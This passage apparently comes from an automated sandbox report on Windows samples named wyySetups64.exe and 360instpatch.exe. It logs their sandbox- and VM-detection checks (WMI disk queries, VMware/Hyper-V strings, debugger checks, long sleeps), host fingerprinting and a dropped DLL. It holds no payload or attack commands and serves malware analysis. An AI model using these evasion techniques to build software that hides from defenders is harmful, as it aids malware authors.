    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Contains functionality to compare user and computer (likely to detect sandboxes)
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,8_2_00B68A46
    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
    Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
    Source: C:\Users\user\Downloads\360instpatch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEFAC4D rdtsc 8_2_6BEFAC4D
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,8_2_00B567A4
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,8_2_00B788EB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,8_2_00B24BD0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetAdaptersInfo,GetTickCount,_sprintf,8_2_6BEFA873
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_00B567A4
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_00B788EB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,9_2_00B24BD0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeWindow / User API: threadDelayed 1495Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeWindow / User API: threadDelayed 3452Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeWindow / User API: threadDelayed 4063Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5197Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeWindow / User API: threadDelayed 9792Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-11249
    Source: C:\Users\user\Downloads\360instpatch.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dllJump to dropped file
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-44017
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-44016
    Source: C:\Users\user\Downloads\360instpatch.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
    Source: C:\Users\user\Downloads\360instpatch.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_8-147620
    Source: C:\Users\user\Downloads\360instpatch.exeAPI coverage: 0.7 %
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 1368Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 6120Thread sleep time: -1495000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 4504Thread sleep time: -34520s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 6120Thread sleep time: -4063000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep count: 5197 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep count: 1647 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep count: 307 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exe TID: 792Thread sleep time: -217500s >= -30000sJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exe TID: 792Thread sleep time: -14688000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 5064Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 6772Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Downloads\360instpatch.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeThread sleep count: Count: 3452 delay: -10Jump to behavior
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,8_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00B73FB0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,8_2_6BF3A6BA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CD3E2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_6CD3E2B7
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,9_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,9_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00B73FB0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_033780F0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03375430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,1_2_03375430
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
    Source: 360instpatch.exe.0.drBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
    Source: wyySetups64.exe, 00000000.00000002.1810189166.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
    Source: wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3462473885.000001A6AFC5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3461758605.000001A6AA62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
    Source: wyySetups64.exe, 00000001.00000002.4115270099.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeAPI call chain: ExitProcess graph end nodegraph_1-43540
    Source: C:\Users\user\Downloads\360instpatch.exeAPI call chain: ExitProcess graph end nodegraph_8-148112
    Source: C:\Users\user\Desktop\wyySetups64.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEFAC4D rdtsc 8_2_6BEFAC4D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1001124D
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B19CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,8_2_00B19CD0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338054D VirtualProtect ?,-00000001,00000104,?1_2_0338054D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,0_2_10001170
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D50AE4 mov eax, dword ptr fs:[00000030h]0_2_00D50AE4
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B20AE4 mov eax, dword ptr fs:[00000030h]1_2_00B20AE4
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F00CD mov eax, dword ptr fs:[00000030h]1_2_031F00CD
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,1_2_03376790
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1001154A
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1001124D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D61520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D61520
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D61521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D61521
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,1_2_0337DF10
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0337F00A
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03381F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03381F67
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD6815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00BD6815
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD8587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD8587
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B9A44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00B9A44A
